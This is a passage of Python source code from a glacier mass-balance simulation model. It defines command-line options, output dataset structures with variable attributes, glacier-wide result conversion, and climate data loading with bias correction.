parser.add_argument('-option_parallels', action='store', type=int, default=1,
help='Switch to use or not use parallels (1 - use parallels, 0 - do not)')
parser.add_argument('-rgi_glac_number_fn', action='store', type=str, default=None,
help='Filename containing list of rgi_glac_number, helpful for running batches on spc')
parser.add_argument('-batch_number', action='store', type=int, default=None,
help='Batch number used to differentiate output on supercomputer')
parser.add_argument('-option_ordered', action='store', type=int, default=1,
help='switch to keep lists ordered or not')
parser.add_argument('-debug', action='store', type=int, default=0,
help='Boolean for debugging to turn it on or off (default 0 is off')
parser.add_argument('-debug_spc', action='store', type=int, default=0,
help='Boolean for debugging to turn it on or off (default 0 is off')
return parser
def calc_stats_array(data, stats_cns=input.sim_stat_cns):
"""
Calculate stats for a given variable
Parameters
----------
vn : str
variable name
ds : xarray dataset
dataset of output with all ensemble simulations
Returns
-------
stats : np.array
Statistics related to a given variable
"""
if 'mean' in stats_cns:
stats = data.mean(axis=1)[:,np.newaxis]
if 'std' in stats_cns:
stats = np.append(stats, data.std(axis=1)[:,np.newaxis], axis=1)
if '2.5%' in stats_cns:
stats = np.append(stats, np.percentile(data, 2.5, axis=1)[:,np.newaxis], axis=1)
if '25%' in stats_cns:
stats = np.append(stats, np.percentile(data, 25, axis=1)[:,np.newaxis], axis=1)
if 'median' in stats_cns:
stats = np.append(stats, np.median(data, axis=1)[:,np.newaxis], axis=1)
if '75%' in stats_cns:
stats = np.append(stats, np.percentile(data, 75, axis=1)[:,np.newaxis], axis=1)
if '97.5%' in stats_cns:
stats = np.append(stats, np.percentile(data, 97.5, axis=1)[:,np.newaxis], axis=1)
return stats
def create_xrdataset(main_glac_rgi, dates_table, sim_iters=input.sim_iters, stat_cns=input.sim_stat_cns,
record_stats=0, option_wateryear=input.gcm_wateryear):
"""
Create empty xarray dataset that will be used to record simulation runs.
Parameters
----------
main_glac_rgi : pandas dataframe
dataframe containing relevant rgi glacier information
dates_table : pandas dataframe
table of the dates, months, days in month, etc.
sim_iters : int
number of simulation runs included
stat_cns : list
list of strings containing statistics that will be used on simulations
record_stats : int
Switch to change from recording simulations to statistics
Returns
-------
output_ds_all : xarray Dataset
empty xarray dataset that contains variables and attributes to be filled in by simulation runs
encoding : dictionary
encoding used with exporting xarray dataset to netcdf
"""
if input.output_package == 2:
# Create empty datasets for each variable and merge them
# Coordinate values
output_variables = input.output_variables_package2
glac_values = main_glac_rgi.index.values
annual_columns = np.unique(dates_table['wateryear'].values)[0:int(dates_table.shape[0]/12)]
time_values = dates_table.loc[input.spinupyears*12:dates_table.shape[0]+1,'date'].tolist()
year_values = annual_columns[input.spinupyears:annual_columns.shape[0]]
year_plus1_values = np.concatenate((annual_columns[input.spinupyears:annual_columns.shape[0]],
np.array([annual_columns[annual_columns.shape[0]-1]+1])))
# Year type for attributes
if option_wateryear == 1:
year_type = 'water year'
elif option_wateryear == 2:
year_type = 'calendar year'
else:
year_type = 'custom year'
# Switch to record simulations or statistics
if record_stats == 0:
record_name = 'sim'
record_name_values = np.arange(0,sim_iters)
elif record_stats == 1:
record_name = 'stats'
record_name_values = input.sim_stat_cns
# Variable coordinates dictionary
output_coords_dict = {
'prec_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'temp_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'acc_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'refreeze_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'melt_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'frontalablation_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'massbaltotal_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'runoff_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'snowline_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'area_glac_annual': collections.OrderedDict(
[('glac', glac_values), ('year_plus1', year_plus1_values), (record_name, record_name_values)]),
'volume_glac_annual': collections.OrderedDict(
[('glac', glac_values), ('year_plus1', year_plus1_values), (record_name, record_name_values)]),
'ELA_glac_annual': collections.OrderedDict(
[('glac', glac_values), ('year', year_values), (record_name, record_name_values)]),
'offglac_prec_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'offglac_refreeze_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'offglac_melt_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'offglac_snowpack_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'offglac_runoff_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
}
# Attributes dictionary
output_attrs_dict = {
'time': {
'long_name': 'date',
'year_type':year_type},
'glac': {
'long_name': 'glacier index',
'comment': 'glacier index value that refers to the glacier table'},
'year': {
'long_name': 'years',
'year_type': year_type,
'comment': 'years referring to the start of each year'},
'year_plus1': {
'long_name': 'years plus one additional year',
'year_type': year_type,
'comment': ('additional year allows one to record glacier dimension changes at end of '
'model run')},
'sim': {
'long_name': 'simulation number',
'comment': 'simulation numbers only needed for MCMC methods'},
'stats': {
'long_name': 'variable statistics',
'comment': '% refers to percentiles'},
'temp_glac_monthly': {
'long_name': 'glacier-wide mean air temperature',
'units': 'degC',
'temporal_resolution': 'monthly',
'comment': (
'each elevation bin is weighted equally to compute the mean temperature, and '
'bins where the glacier no longer exists due to retreat have been removed')},
'prec_glac_monthly': {
'long_name': 'glacier-wide precipitation (liquid)',
'units': 'm',
'temporal_resolution': 'monthly',
'comment': 'only the liquid precipitation, solid precipitation excluded'},
'acc_glac_monthly': {
'long_name': 'glacier-wide accumulation',
'units': 'm w.e.',
'temporal_resolution': 'monthly',
'comment': 'only the solid precipitation'},
'refreeze_glac_monthly': {
'long_name': 'glacier-wide refreeze',
'units': 'm w.e.',
'temporal_resolution': 'monthly'},
'melt_glac_monthly': {
'long_name': 'glacier-wide melt',
'units': 'm w.e.',
'temporal_resolution': 'monthly'},
'frontalablation_glac_monthly': {
'long_name': 'glacier-wide frontal ablation',
'units': 'm w.e.',
'temporal_resolution': 'monthly',
'comment': (
'mass losses from calving, subaerial frontal melting, sublimation above the '
'waterline and subaqueous frontal melting below the waterline')},
'massbaltotal_glac_monthly': {
'long_name': 'glacier-wide total mass balance',
'units': 'm w.e.',
'temporal_resolution': 'monthly',
'comment': (
'total mass balance is the sum of the climatic mass balance and frontal '
'ablation')},
'runoff_glac_monthly': {
'long_name': 'glacier-wide runoff',
'units': 'm**3',
'temporal_resolution': 'monthly',
'comment': 'runoff from the glacier terminus, which moves over time'},
'snowline_glac_monthly': {
'long_name': 'transient snowline',
'units': 'm a.s.l.',
'temporal_resolution': 'monthly',
'comment': 'transient snowline is altitude separating snow from ice/firn'},
'area_glac_annual': {
'long_name': 'glacier area',
'units': 'km**2',
'temporal_resolution': 'annual',
'comment': 'area used for the duration of the defined start/end of year'},
'volume_glac_annual': {
'long_name': 'glacier volume',
'units': 'km**3 ice',
'temporal_resolution': 'annual',
'comment': 'volume based on area and ice thickness used for that year'},
'ELA_glac_annual': {
'long_name': 'annual equilibrium line altitude',
'units': 'm a.s.l.',
'temporal_resolution': 'annual',
'comment': (
'equilibrium line altitude is the elevation where the climatic mass balance is '
'zero')},
'offglac_prec_monthly': {
'long_name': 'off-glacier-wide precipitation (liquid)',
'units': 'm',
'temporal_resolution': 'monthly',
'comment': 'only the liquid precipitation, solid precipitation excluded'},
'offglac_refreeze_monthly': {
'long_name': 'off-glacier-wide refreeze',
'units': 'm w.e.',
'temporal_resolution': 'monthly'},
'offglac_melt_monthly': {
'long_name': 'off-glacier-wide melt',
'units': 'm w.e.',
'temporal_resolution': 'monthly',
'comment': 'only melt of snow and refreeze since off-glacier'},
'offglac_runoff_monthly': {
'long_name': 'off-glacier-wide runoff',
'units': 'm**3',
'temporal_resolution': 'monthly',
'comment': 'off-glacier runoff from area where glacier no longer exists'},
'offglac_snowpack_monthly': {
'long_name': 'off-glacier-wide snowpack',
'units': 'm w.e.',
'temporal_resolution': 'monthly',
'comment': 'snow remaining accounting for new accumulation, melt, and refreeze'},
}
# Add variables to empty dataset and merge together
count_vn = 0
encoding = {}
noencoding_vn = ['stats', 'glac_attrs']
for vn in output_variables:
count_vn += 1
empty_holder = np.zeros([len(output_coords_dict[vn][i]) for i in list(output_coords_dict[vn].keys())])
output_ds = xr.Dataset({vn: (list(output_coords_dict[vn].keys()), empty_holder)},
coords=output_coords_dict[vn])
# Merge datasets of stats into one output
if count_vn == 1:
output_ds_all = output_ds
else:
output_ds_all = xr.merge((output_ds_all, output_ds))
# Add a glacier table so that the glaciers attributes accompany the netcdf file
main_glac_rgi_float = main_glac_rgi[input.output_glacier_attr_vns].copy()
main_glac_rgi_xr = xr.Dataset({'glacier_table': (('glac', 'glac_attrs'), main_glac_rgi_float.values)},
coords={'glac': glac_values,
'glac_attrs': main_glac_rgi_float.columns.values})
output_ds_all = output_ds_all.combine_first(main_glac_rgi_xr)
output_ds_all.glacier_table.attrs['long_name'] = 'RGI glacier table'
output_ds_all.glacier_table.attrs['comment'] = 'table contains attributes from RGI for each glacier'
output_ds_all.glac_attrs.attrs['long_name'] = 'RGI glacier attributes'
# Add attributes
for vn in output_ds_all.variables:
try:
output_ds_all[vn].attrs = output_attrs_dict[vn]
except:
pass
# Encoding (specify _FillValue, offsets, etc.)
if vn not in noencoding_vn:
encoding[vn] = {'_FillValue': False}
return output_ds_all, encoding
def convert_glacwide_results(elev_bins, glac_bin_temp, glac_bin_prec, glac_bin_acc, glac_bin_refreeze,
glac_bin_snowpack, glac_bin_melt, glac_bin_frontalablation, glac_bin_massbalclim_annual,
glac_bin_area_annual, glac_bin_icethickness_annual):
"""
Convert raw runmassbalance function output to glacier-wide results for output package 2
Parameters
----------
elev_bins : numpy array
elevation of each elevation bin
glac_bin_temp : numpy array
temperature for each elevation bin for each timestep
glac_bin_prec : numpy array
precipitation (liquid) for each elevation bin for each timestep
glac_bin_acc : numpy array
accumulation (solid precipitation) for each elevation bin for each timestep
glac_bin_refreeze : numpy array
refreeze for each elevation bin for each timestep
glac_bin_snowpack : numpy array
snowpack for each elevation bin for each timestep
glac_bin_melt : numpy array
glacier melt for each elevation bin for each timestep
glac_bin_frontalablation : numpy array
frontal ablation for each elevation bin for each timestep
glac_bin_massbalclim_annual : numpy array
annual climatic mass balance for each elevation bin for each timestep
glac_bin_area_annual : numpy array
annual glacier area for each elevation bin for each timestep
glac_bin_icethickness_annual: numpy array
annual ice thickness for each elevation bin for each timestep
Returns
-------
glac_wide_temp : np.array
monthly mean glacier-wide temperature (bins weighted equally)
glac_wide_prec : np.array
monthly glacier-wide precipitation (liquid only)
glac_wide_acc : np.array
monthly glacier-wide accumulation (solid precipitation only)
glac_wide_refreeze : np.array
monthly glacier-wide refreeze
glac_wide_melt : np.array
monthly glacier-wide melt
glac_wide_frontalablation : np.array
monthly glacier-wide frontal ablation
glac_wide_massbaltotal : np.array
monthly glacier-wide total mass balance (climatic mass balance + frontal ablation)
glac_wide_runoff: np.array
monthly glacier-wide runoff at the terminus of the glacier
glac_wide_snowline : np.array
monthly glacier-wide snowline
glac_wide_area_annual : np.array
annual glacier area
glac_wide_volume_annual : np.array
annual glacier volume
glac_wide_ELA_annual : np.array
annual equilibrium line altitude
"""
# Preset desired output (needed to avoid dividing by zero)
glac_wide_temp = np.zeros(glac_bin_temp.shape[1])
glac_wide_prec = np.zeros(glac_bin_temp.shape[1])
glac_wide_acc = np.zeros(glac_bin_temp.shape[1])
glac_wide_refreeze = np.zeros(glac_bin_temp.shape[1])
glac_wide_melt = np.zeros(glac_bin_temp.shape[1])
glac_wide_frontalablation = np.zeros(glac_bin_temp.shape[1])
# Compute desired output
glac_bin_area = glac_bin_area_annual[:,0:glac_bin_area_annual.shape[1]-1].repeat(12,axis=1)
glac_wide_area = glac_bin_area.sum(axis=0)
glac_wide_temp_sum = glac_bin_temp.sum(axis=0)
glac_bin_temp_nonzero = np.zeros(glac_bin_temp.shape)
glac_bin_temp_nonzero[glac_bin_temp != 0] = 1
glac_wide_temp_bincount = glac_bin_temp_nonzero.sum(axis=0)
glac_wide_temp[glac_wide_temp_bincount > 0] = (glac_wide_temp_sum[glac_wide_temp_bincount > 0] /
glac_wide_temp_bincount[glac_wide_temp_bincount > 0])
glac_wide_prec_mkm2 = (glac_bin_prec * glac_bin_area).sum(axis=0)
glac_wide_prec[glac_wide_prec_mkm2 > 0] = (glac_wide_prec_mkm2[glac_wide_prec_mkm2 > 0] /
glac_wide_area[glac_wide_prec_mkm2 > 0])
glac_wide_acc_mkm2 = (glac_bin_acc * glac_bin_area).sum(axis=0)
glac_wide_acc[glac_wide_acc_mkm2 > 0] = (glac_wide_acc_mkm2[glac_wide_acc_mkm2 > 0] /
glac_wide_area[glac_wide_acc_mkm2 > 0])
glac_wide_refreeze_mkm2 = (glac_bin_refreeze * glac_bin_area).sum(axis=0)
glac_wide_refreeze[glac_wide_refreeze_mkm2 > 0] = (glac_wide_refreeze_mkm2[glac_wide_refreeze_mkm2 > 0] /
glac_wide_area[glac_wide_refreeze_mkm2 > 0])
glac_wide_melt_mkm2 = (glac_bin_melt * glac_bin_area).sum(axis=0)
glac_wide_melt[glac_wide_melt_mkm2 > 0] = (glac_wide_melt_mkm2[glac_wide_melt_mkm2 > 0] /
glac_wide_area[glac_wide_melt_mkm2 > 0])
glac_wide_frontalablation_mkm2 = (glac_bin_frontalablation * glac_bin_area).sum(axis=0)
glac_wide_frontalablation[glac_wide_frontalablation_mkm2 > 0] = (
glac_wide_frontalablation_mkm2[glac_wide_frontalablation_mkm2 > 0] /
glac_wide_area[glac_wide_frontalablation_mkm2 > 0])
glac_wide_massbalclim = glac_wide_acc + glac_wide_refreeze - glac_wide_melt
glac_wide_massbaltotal = glac_wide_massbalclim - glac_wide_frontalablation
glac_wide_runoff = (glac_wide_prec + glac_wide_melt - glac_wide_refreeze) * glac_wide_area * (1000)**2
# units: (m + m w.e. - m w.e.) * km**2 * (1000 m / 1 km)**2 = m**3
glac_wide_snowline = (glac_bin_snowpack > 0).argmax(axis=0)
glac_wide_snowline[glac_wide_snowline > 0] = (elev_bins[glac_wide_snowline[glac_wide_snowline > 0]] -
input.binsize/2)
glac_wide_area_annual = glac_bin_area_annual.sum(axis=0)
glac_wide_volume_annual = (glac_bin_area_annual * glac_bin_icethickness_annual / 1000).sum(axis=0)
glac_wide_ELA_annual = (glac_bin_massbalclim_annual > 0).argmax(axis=0)
glac_wide_ELA_annual[glac_wide_ELA_annual > 0] = (elev_bins[glac_wide_ELA_annual[glac_wide_ELA_annual > 0]] -
input.binsize/2)
# ELA and snowline can't be below minimum elevation
glac_zmin_annual = elev_bins[(glac_bin_area_annual > 0).argmax(axis=0)][:-1] - input.binsize/2
glac_wide_ELA_annual[glac_wide_ELA_annual < glac_zmin_annual] = (
glac_zmin_annual[glac_wide_ELA_annual < glac_zmin_annual])
glac_zmin = elev_bins[(glac_bin_area > 0).argmax(axis=0)] - input.binsize/2
glac_wide_snowline[glac_wide_snowline < glac_zmin] = glac_zmin[glac_wide_snowline < glac_zmin]
# print('DELETE ME - TESTING')
# # Compute glacier volume change for every time step and use this to compute mass balance
# # this will work for any indexing
# glac_wide_area = glac_wide_area_annual[:-1].repeat(12)
#
## print('glac_wide_area_annual:', glac_wide_area_annual)
#
# # Mass change [km3 mwe]
# # mb [mwea] * (1 km / 1000 m) * area [km2]
# glac_wide_masschange = glac_wide_massbaltotal / 1000 * glac_wide_area
#
# print('glac_wide_melt:', glac_wide_melt)
## print('glac_wide_massbaltotal:', glac_wide_massbaltotal)
## print('glac_wide_masschange:', glac_wide_masschange)
## print('glac_wide_masschange.shape[0] / 12:', glac_wide_masschange.shape[0] / 12)
#
# # Mean annual mass balance [mwea]
# mb_mwea = (glac_wide_masschange.sum() / glac_wide_area[0] * 1000 /
# (glac_wide_masschange.shape[0] / 12))
# print(' mb_model [mwea]:', mb_mwea.round(3))
return (glac_wide_temp, glac_wide_prec, glac_wide_acc, glac_wide_refreeze, glac_wide_melt,
glac_wide_frontalablation, glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline,
glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual)
def main(list_packed_vars):
"""
Model simulation
Parameters
----------
list_packed_vars : list
list of packed variables that enable the use of parallels
Returns
-------
netcdf files of the simulation output (specific output is dependent on the output option)
"""
# Unpack variables
count = list_packed_vars[0]
glac_no = list_packed_vars[1]
regions_str = list_packed_vars[2]
gcm_name = list_packed_vars[3]
parser = getparser()
args = parser.parse_args()
if (gcm_name != input.ref_gcm_name) and (args.rcp is None):
rcp_scenario = os.path.basename(args.gcm_list_fn).split('_')[1]
elif args.rcp is not None:
rcp_scenario = args.rcp
if debug:
if 'rcp_scenario' in locals():
print(rcp_scenario)
if args.debug_spc == 1:
debug_spc = True
else:
debug_spc = False
# ===== LOAD GLACIERS =====
main_glac_rgi = modelsetup.selectglaciersrgitable(glac_no=glac_no)
# Load glacier data for Huss and Farinotti to avoid repetitively reading the csv file (not needed for OGGM)
if input.hyps_data in ['Huss', 'Farinotti']:
# Glacier hypsometry [km**2], total area
main_glac_hyps = modelsetup.import_Husstable(main_glac_rgi, input.hyps_filepath, input.hyps_filedict,
input.hyps_colsdrop)
# Ice thickness [m], average
main_glac_icethickness = modelsetup.import_Husstable(main_glac_rgi, input.thickness_filepath,
input.thickness_filedict, input.thickness_colsdrop)
main_glac_icethickness[main_glac_icethickness < 0] = 0
main_glac_hyps[main_glac_icethickness == 0] = 0
# Width [km], average
main_glac_width = modelsetup.import_Husstable(main_glac_rgi, input.width_filepath, input.width_filedict,
input.width_colsdrop)
# if input.option_surfacetype_debris == 1:
# main_glac_debrisfactor = modelsetup.import_Husstable(main_glac_rgi, input.debris_fp, input.debris_filedict,
# input.debris_colsdrop)
# else:
# print('\n\nDELETE ME - CHECK THAT THIS IS SAME FORMAT AS MAIN_GLAC_HYPS AND OTHERS\n\n')
# main_glac_debrisfactor = np.zeros(main_glac_hyps.shape) + 1
# main_glac_debrisfactor[main_glac_hyps == 0] = 0
# ===== TIME PERIOD =====
dates_table = modelsetup.datesmodelrun(startyear=input.gcm_startyear, endyear=input.gcm_endyear,
spinupyears=input.gcm_spinupyears, option_wateryear=input.gcm_wateryear)
# # =================
# if debug:
# # Select dates including future projections
# # - nospinup dates_table needed to get the proper time indices
# dates_table_nospinup = modelsetup.datesmodelrun(startyear=input.gcm_startyear, endyear=input.gcm_endyear,
# spinupyears=0, option_wateryear=input.gcm_wateryear)
#
# # ===== LOAD CALIBRATION DATA =====
# cal_data = pd.DataFrame()
# for dataset in input.cal_datasets:
# cal_subset = class_mbdata.MBData(name=dataset)
# cal_subset_data = cal_subset.retrieve_mb(main_glac_rgi, main_glac_hyps, dates_table_nospinup)
# cal_data = cal_data.append(cal_subset_data, ignore_index=True)
# cal_data = cal_data.sort_values(['glacno', 't1_idx'])
# cal_data.reset_index(drop=True, inplace=True)
# # =================
# ===== LOAD CLIMATE DATA =====
# Set up climate class
if gcm_name in ['ERA5', 'ERA-Interim', 'COAWST']:
gcm = class_climate.GCM(name=gcm_name)
# Check that end year is reasonable
if (input.gcm_endyear > int(time.strftime("%Y"))) and (input.option_synthetic_sim == 0):
print('\n\nEND YEAR BEYOND AVAILABLE DATA FOR ERA-INTERIM. CHANGE END YEAR.\n\n')
else:
# GCM object
gcm = class_climate.GCM(name=gcm_name, rcp_scenario=rcp_scenario)
# Reference GCM
ref_gcm = class_climate.GCM(name=input.ref_gcm_name)
# Adjust reference dates in event that reference is longer than GCM data
if input.ref_startyear >= input.gcm_startyear:
ref_startyear = input.ref_startyear
else:
ref_startyear = input.gcm_startyear
if input.ref_endyear <= input.gcm_endyear:
ref_endyear = input.ref_endyear
else:
ref_endyear = input.gcm_endyear
dates_table_ref = modelsetup.datesmodelrun(startyear=ref_startyear, endyear=ref_endyear,
spinupyears=input.spinupyears,
option_wateryear=input.ref_wateryear)
# Load climate data
if input.option_synthetic_sim == 0:
# Air temperature [degC]
gcm_temp, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn, gcm.temp_vn, main_glac_rgi,
dates_table)
if input.option_ablation != 2:
gcm_tempstd = np.zeros(gcm_temp.shape)
elif input.option_ablation == 2 and gcm_name in ['ERA5']:
gcm_tempstd, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.tempstd_fn, gcm.tempstd_vn,
main_glac_rgi, dates_table)
elif input.option_ablation == 2 and input.ref_gcm_name in ['ERA5']:
# Compute temp std based on reference climate data
ref_tempstd, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.tempstd_fn, ref_gcm.tempstd_vn,
main_glac_rgi, dates_table_ref)
# Monthly average from reference climate data
gcm_tempstd = gcmbiasadj.monthly_avg_array_rolled(ref_tempstd, dates_table_ref, dates_table)
else:
gcm_tempstd = np.zeros(gcm_temp.shape)
# Precipitation [m]
gcm_prec, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn, gcm.prec_vn, main_glac_rgi,
dates_table)
# Elevation [m asl]
gcm_elev = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn, gcm.elev_vn, main_glac_rgi)
# Lapse rate
if gcm_name in ['ERA-Interim', 'ERA5']:
gcm_lr, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.lr_fn, gcm.lr_vn, main_glac_rgi, dates_table)
else:
# Compute lapse rates based on reference climate data
ref_lr, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.lr_fn, ref_gcm.lr_vn, main_glac_rgi,
dates_table_ref)
# Monthly average from reference climate data
gcm_lr = gcmbiasadj.monthly_avg_array_rolled(ref_lr, dates_table_ref, dates_table)
# COAWST data has two domains, so need to merge the two domains
if gcm_name == 'COAWST':
gcm_temp_d01, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn_d01, gcm.temp_vn,
main_glac_rgi, dates_table)
gcm_prec_d01, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn_d01, gcm.prec_vn,
main_glac_rgi, dates_table)
gcm_elev_d01 = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn_d01, gcm.elev_vn, main_glac_rgi)
# Check if glacier outside of high-res (d02) domain
for glac in range(main_glac_rgi.shape[0]):
glac_lat = main_glac_rgi.loc[glac,input.rgi_lat_colname]
glac_lon = main_glac_rgi.loc[glac,input.rgi_lon_colname]
if (~(input.coawst_d02_lat_min <= glac_lat <= input.coawst_d02_lat_max) or
~(input.coawst_d02_lon_min <= glac_lon <= input.coawst_d02_lon_max)):
gcm_prec[glac,:] = gcm_prec_d01[glac,:]
gcm_temp[glac,:] = gcm_temp_d01[glac,:]
gcm_elev[glac] = gcm_elev_d01[glac]
# ===== Synthetic Simulation =====
elif input.option_synthetic_sim == 1:
# Synthetic dates table
dates_table_synthetic = modelsetup.datesmodelrun(
startyear=input.synthetic_startyear, endyear=input.synthetic_endyear,
option_wateryear=input.gcm_wateryear, spinupyears=0)
# Air temperature [degC]
gcm_temp_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn, gcm.temp_vn, main_glac_rgi,
dates_table_synthetic)
# Precipitation [m]
gcm_prec_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn, gcm.prec_vn, main_glac_rgi,
dates_table_synthetic)
# Elevation [m asl]
gcm_elev = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn, gcm.elev_vn, main_glac_rgi)
# Lapse rate
gcm_lr_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.lr_fn, gcm.lr_vn, main_glac_rgi,
dates_table_synthetic)
# Future simulation based on synthetic (replicated) data; add spinup years; dataset restarts after spinupyears
datelength = dates_table.shape[0] - input.gcm_spinupyears * 12
n_tiles = int(np.ceil(datelength / dates_table_synthetic.shape[0]))
gcm_temp = np.append(gcm_temp_tile[:,:input.gcm_spinupyears*12],
np.tile(gcm_temp_tile,(1,n_tiles))[:,:datelength], axis=1)
gcm_prec = np.append(gcm_prec_tile[:,:input.gcm_spinupyears*12],
np.tile(gcm_prec_tile,(1,n_tiles))[:,:datelength], axis=1)
gcm_lr = np.append(gcm_lr_tile[:,:input.gcm_spinupyears*12], np.tile(gcm_lr_tile,(1,n_tiles))[:,:datelength],
axis=1)
# Temperature and precipitation sensitivity adjustments
gcm_temp = gcm_temp + input.synthetic_temp_adjust
gcm_prec = gcm_prec * input.synthetic_prec_factor
# ===== BIAS CORRECTIONS =====
# No adjustments
if input.option_bias_adjustment == 0 or gcm_name == input.ref_gcm_name:
gcm_temp_adj = gcm_temp
gcm_prec_adj = gcm_prec
gcm_elev_adj = gcm_elev
# Bias correct based on reference climate data
else:
# Air temperature [degC], Precipitation [m], Elevation [masl], Lapse rate [K m-1]
ref_temp, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.temp_fn, ref_gcm.temp_vn,
main_glac_rgi, dates_table_ref)
ref_prec, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.prec_fn, ref_gcm.prec_vn,
main_glac_rgi, dates_table_ref)
ref_elev = ref_gcm.importGCMfxnearestneighbor_xarray(ref_gcm.elev_fn, ref_gcm.elev_vn, main_glac_rgi)
# OPTION 1: Adjust temp using Huss and Hock (2015), prec similar but addresses for variance and outliers
if input.option_bias_adjustment == 1:
# Temperature bias correction
gcm_temp_adj, gcm_elev_adj = gcmbiasadj.temp_biasadj_HH2015(ref_temp, ref_elev, gcm_temp,
dates_table_ref, dates_table)
# Precipitation bias correction
gcm_prec_adj, gcm_elev_adj = gcmbiasadj.prec_biasadj_opt1(ref_prec, ref_elev, gcm_prec,
dates_table_ref, dates_table)
# OPTION 2: Adjust temp and prec using Huss and Hock (2015)
elif input.option_bias_adjustment == 2:
# Temperature bias correction
gcm_temp_adj, gcm_elev_adj = gcmbiasadj.temp_biasadj_HH2015(ref_temp, ref_elev, gcm_temp,
dates_table_ref, dates_table)
# Precipitation bias correction
gcm_prec_adj, gcm_elev_adj = gcmbiasadj.prec_biasadj_HH2015(ref_prec, ref_elev, gcm_prec,
dates_table_ref, dates_table)
# Checks on precipitation data
assert gcm_prec_adj.max() <= 10, 'gcm_prec_adj (precipitation bias adjustment) too high, needs to be modified'
assert gcm_prec_adj.min() >= 0, 'gcm_prec_adj is producing a negative precipitation value'
# ===== RUN MASS BALANCE =====
# Number of simulations
if input.option_calibration == 2:
sim_iters = input.sim_iters
else:
sim_iters = 1
# # Create datasets to store simulations
# output_ds_all, encoding = create_xrdataset(main_glac_rgi, dates_table, sim_iters=sim_iters,
# option_wateryear=input.gcm_wateryear)
# output_ds_all_stats, encoding = create_xrdataset(main_glac_rgi, dates_table, record_stats=1,
# option_wateryear=input.gcm_wateryear)
for glac in range(main_glac_rgi.shape[0]):
if glac == 0 or glac == main_glac_rgi.shape[0]:
print(gcm_name,':', main_glac_rgi.loc[main_glac_rgi.index.values[glac],'RGIId'])
# Select subsets of data
glacier_rgi_table = main_glac_rgi.loc[main_glac_rgi.index.values[glac], :]
glacier_str = '{0:0.5f}'.format(glacier_rgi_table['RGIId_float'])
glacier_gcm_elev = gcm_elev_adj[glac]
glacier_gcm_prec = gcm_prec_adj[glac,:]
glacier_gcm_temp = gcm_temp_adj[glac,:]
glacier_gcm_tempstd = gcm_tempstd[glac,:]
glacier_gcm_lrgcm = gcm_lr[glac,:]
glacier_gcm_lrglac = glacier_gcm_lrgcm.copy()
# ===== Load glacier data: area (km2), ice thickness (m), width (km) =====
if input.hyps_data in ['oggm']:
glac_oggm_df = pd.read_csv(input.oggm_glacierdata_fp + 'RGI60-' + glacier_str + '.csv', index_col=0)
glacier_area_initial = glac_oggm_df['w'].values * glac_oggm_df['dx'].values / 1e6
icethickness_initial = glac_oggm_df['h'].values
width_initial = glac_oggm_df['w'].values / 1e3
elev_bins = glac_oggm_df['z'].values
elif input.hyps_data in ['Huss', 'Farinotti']:
glacier_area_initial = main_glac_hyps.iloc[glac,:].values.astype(float)
icethickness_initial = main_glac_icethickness.iloc[glac,:].values.astype(float)
width_initial = main_glac_width.iloc[glac,:].values.astype(float)
elev_bins = main_glac_hyps.columns.values.astype(int)
# if input.option_surfacetype_debris == 1:
# glacier_debrisfactor = main_glac_debrisfactor.iloc[glac,:].values.astype(float)
# # Empty datasets to record output
# annual_columns = np.unique(dates_table['wateryear'].values)[0:int(dates_table.shape[0]/12)]
# year_values = annual_columns[input.spinupyears:annual_columns.shape[0]]
# year_plus1_values = np.concatenate((annual_columns[input.spinupyears:annual_columns.shape[0]],
# np.array([annual_columns[annual_columns.shape[0]-1]+1])))
# output_temp_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_prec_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_acc_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_refreeze_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_melt_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_frontalablation_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_massbaltotal_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
